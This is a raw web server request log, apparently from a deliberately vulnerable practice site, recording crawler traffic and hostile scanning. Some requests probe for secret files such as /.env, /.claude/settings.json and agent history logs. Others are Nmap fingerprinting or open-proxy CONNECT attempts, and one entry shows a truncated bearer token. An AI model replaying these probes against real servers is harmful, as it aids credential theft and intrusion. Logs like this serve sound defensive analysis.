User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.153.125
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43612
Path: /
URL: /
Method: GET
[2026-03-14 19:40:13] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: google.com:443
RemoteAddr: 165.245.179.4:49110
Path:
URL: //google.com:443
Method: CONNECT
[2026-03-14 19:00:18] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 212.23.222.58:45098
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-03-14 17:57:13] === HTTP Request ===
===================
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.google.com:443
RemoteAddr: 212.23.222.58:45102
Path:
URL: //www.google.com:443
Method: CONNECT
[2026-03-14 17:57:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:42094
Path: /jars
URL: /jars
Method: GET
[2026-03-14 17:29:01] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:64186
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-14 13:11:17] === HTTP Request ===
[2026-03-14 12:18:57] Main page accessed - IP: 34.79.139.212:52054
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.79.139.212:52054
Path: /
URL: /
Method: GET
[2026-03-14 12:18:57] === HTTP Request ===
[2026-03-14 11:21:54] Main page accessed - IP: 34.79.55.15:37166
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.79.55.15:37166
Path: /
URL: /
Method: GET
[2026-03-14 11:21:54] === HTTP Request ===
[2026-03-14 10:21:32] Main page accessed - IP: 64.62.156.29:7853
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.29:7853
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-14 10:21:32] === HTTP Request ===
[2026-03-14 10:19:59] Main page accessed - IP: 64.62.156.24:21430
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.63 Chrome/124.0.6367.63 Not-A.Brand/99  Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.24:21430
Path: /
URL: /
Method: GET
[2026-03-14 10:19:59] === HTTP Request ===
[2026-03-14 10:18:51] Main page accessed - IP: 207.90.244.25:45958
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.25:45958
Path: /
URL: /
Method: GET
[2026-03-14 10:18:51] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:33904
Path: /jars
URL: /jars
Method: GET
[2026-03-14 09:48:42] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.120:6712
Path: /wiki
URL: /wiki
Method: GET
[2026-03-14 09:01:56] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.120:6668
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-14 09:01:50] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.120:6642
Path: *
URL: *
Method: PRI
[2026-03-14 09:01:49] === HTTP Request ===
[2026-03-14 09:01:48] Main page accessed - IP: 66.132.153.120:6624
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.120:6624
Path: /
URL: /
Method: GET
[2026-03-14 09:01:48] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 185.242.3.25:15714
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-14 08:48:13] === HTTP Request ===
[2026-03-14 08:36:24] Main page accessed - IP: 89.110.97.157:52292
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:52292
Path: /
URL: /
Method: GET
[2026-03-14 08:36:24] === HTTP Request ===
[2026-03-14 08:20:31] Main page accessed - IP: 205.210.31.234:61488
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.234:61488
Path: /
URL: /
Method: GET
[2026-03-14 08:20:31] === HTTP Request ===
[2026-03-14 07:06:34] Main page accessed - IP: 35.195.17.170:51320
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.195.17.170:51320
Path: /
URL: /
Method: GET
[2026-03-14 07:06:34] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-For: 74.7.241.160
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33280
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-14 07:00:11] === HTTP Request ===
[2026-03-14 06:41:51] Main page accessed - IP: 121.40.42.45:49876
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 121.40.42.45:49876
Path: /
URL: /
Method: GET
[2026-03-14 06:41:51] === HTTP Request ===
[2026-03-14 06:41:50] Main page accessed - IP: 121.40.42.45:49790
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.40.42.45:49790
Path: /
URL: /
Method: GET
[2026-03-14 06:41:50] === HTTP Request ===
[2026-03-14 06:41:36] Main page accessed - IP: 121.40.42.45:48740
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.40.42.45:48740
Path: /
URL: /
Method: GET
[2026-03-14 06:41:36] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.40.42.45:48784
Path: /HNAP1
URL: /HNAP1
Method: GET
[2026-03-14 06:41:35] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.40.42.45:48778
Path: /evox/about
URL: /evox/about
Method: GET
[2026-03-14 06:41:35] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.40.42.45:48746
Path: /nmaplowercheck1773470494
URL: /nmaplowercheck1773470494
Method: GET
[2026-03-14 06:41:35] === HTTP Request ===
[2026-03-14 06:41:35] Main page accessed - IP: 121.40.42.45:48764
===================
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; mcafee-epo-agent)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.40.42.45:48764
Path: /
URL: /
Method: GET
[2026-03-14 06:41:35] === HTTP Request ===
===================
Body: <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
Content-Length: 441
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.40.42.45:48752
Path: /sdk
URL: /sdk
Method: POST
[2026-03-14 06:41:35] === HTTP Request ===
[2026-03-14 06:41:12] Main page accessed - IP: 121.40.42.45:47124
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.40.42.45:47124
Path: /
URL: /
Method: GET
[2026-03-14 06:41:12] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.10.52:53214
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-14 04:55:50] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.10.52:53218
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-14 04:55:50] === HTTP Request ===
[2026-03-14 04:55:50] Main page accessed - IP: 64.227.10.52:53200
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.10.52:53200
Path: /
URL: /
Method: GET
[2026-03-14 04:55:50] === HTTP Request ===
[2026-03-14 04:55:37] Main page accessed - IP: 157.230.220.136:38632
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 157.230.220.136:38632
Path: /
URL: /
Method: GET
[2026-03-14 04:55:37] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 64.89.160.111:47582
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-03-14 04:44:52] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47656
Path: /.env
URL: /.env
Method: GET
[2026-03-14 02:49:37] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50022
Path: /config.js
URL: /config.js
Method: GET
[2026-03-13 23:44:57] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50048
Path: /.moltbot/history.log
URL: /.moltbot/history.log
Method: GET
[2026-03-13 23:41:49] === HTTP Request ===
[2026-03-13 22:10:55] Login page accessed - IP: 193.142.146.230:55622
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.142.146.230:55622
Path: /login
URL: /login
Method: GET
[2026-03-13 22:10:55] === HTTP Request ===
[2026-03-13 21:34:40] Main page accessed - IP: 143.198.150.150:50720
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 143.198.150.150:50720
Path: /
URL: /
Method: GET
[2026-03-13 21:34:40] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:41626
Path: /nobody/favicon.ico
URL: /nobody/favicon.ico
Method: GET
[2026-03-13 21:01:56] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:41610
Path: /skin/default_1/images/logo.png
URL: /skin/default_1/images/logo.png
Method: GET
[2026-03-13 21:01:55] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:41604
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 21:01:55] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:54100
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 21:01:50] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:54098
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 21:01:49] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:54088
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 21:01:49] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:54072
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 21:01:45] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:54066
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 21:01:42] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:49364
Path: /image/lgbg.jpg
URL: /image/lgbg.jpg
Method: GET
[2026-03-13 21:01:36] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:49352
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 21:01:35] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:49350
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 21:01:30] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:54758
Path: /login.rsp
URL: /login.rsp
Method: GET
[2026-03-13 21:01:25] === HTTP Request ===
[2026-03-13 21:01:25] Main page accessed - IP: 34.12.153.142:54752
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.12.153.142:54752
Path: /
URL: /
Method: GET
[2026-03-13 21:01:25] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.210.22.74:51538
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-13 20:04:50] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.210.22.74:51540
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-13 20:04:50] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.210.22.74:51388
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-13 20:04:49] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.210.22.74:51192
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-13 20:04:49] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.210.22.74:51004
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 20:04:48] === HTTP Request ===
[2026-03-13 20:04:47] Main page accessed - IP: 103.210.22.74:50812
===================
User-Agent: Mozilla/5.0 (Windows NT 7_1; Win64; x64) AppleWebKit/602.47 (KHTML, like Gecko) Chrome/66.0.2641 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 103.210.22.74:50812
Path: /
URL: /
Method: GET
[2026-03-13 20:04:47] === HTTP Request ===
[2026-03-13 20:03:53] Main page accessed - IP: 165.154.172.244:32980
===================
Accept: */*
User-Agent: curl/7.29.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.154.172.244:32980
Path: /
URL: /
Method: GET
[2026-03-13 20:03:53] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50055
Path: /.claude/settings.json
URL: /.claude/settings.json
Method: GET
[2026-03-13 19:41:03] === HTTP Request ===
[2026-03-13 19:27:28] Main page accessed - IP: 147.185.132.72:54590
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.72:54590
Path: /
URL: /
Method: GET
[2026-03-13 19:27:28] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: example.com:443
RemoteAddr: 89.32.41.172:49322
Path:
URL: //example.com:443
Method: CONNECT
[2026-03-13 17:12:39] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:37482
Path: /jars
URL: /jars
Method: GET
[2026-03-13 16:48:27] === HTTP Request ===
[2026-03-13 15:11:21] Main page accessed - IP: 172.30.0.12:57766
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 93.159.230.84
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Linux; arm_64; Android 12; CPH2205) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 YaBrowser/23.3.3.86.00 SA/3 Mobile Safari/537.36
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57766
Path: /
URL: /
Method: GET
[2026-03-13 15:11:21] === HTTP Request ===
[2026-03-13 12:55:00] Main page accessed - IP: 87.236.176.250:35483
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru:8081
RemoteAddr: 87.236.176.250:35483
Path: /
URL: /
Method: GET
[2026-03-13 12:55:00] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.39
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51878
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-13 12:31:26] === HTTP Request ===
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.174:41183
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-13 11:50:34] === HTTP Request ===
[2026-03-13 11:48:25] Main page accessed - IP: 195.184.76.196:37043
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.184.76.196:37043
Path: /
URL: /
Method: GET
[2026-03-13 11:48:25] === HTTP Request ===
[2026-03-13 11:30:06] Main page accessed - IP: 176.65.149.45:50628
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:50628
Path: /
URL: /
Method: GET
[2026-03-13 11:30:06] === HTTP Request ===
[2026-03-13 10:45:01] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:36472
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 178.141.77.200
Referer: https://admin.vulnberries.ru/login
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36472
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-13 10:45:01] === HTTP Request ===
[2026-03-13 10:44:53] Login page accessed - IP: 172.30.0.12:36472
===================
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "Windows"
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/
X-Forwarded-For: 178.141.77.200
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
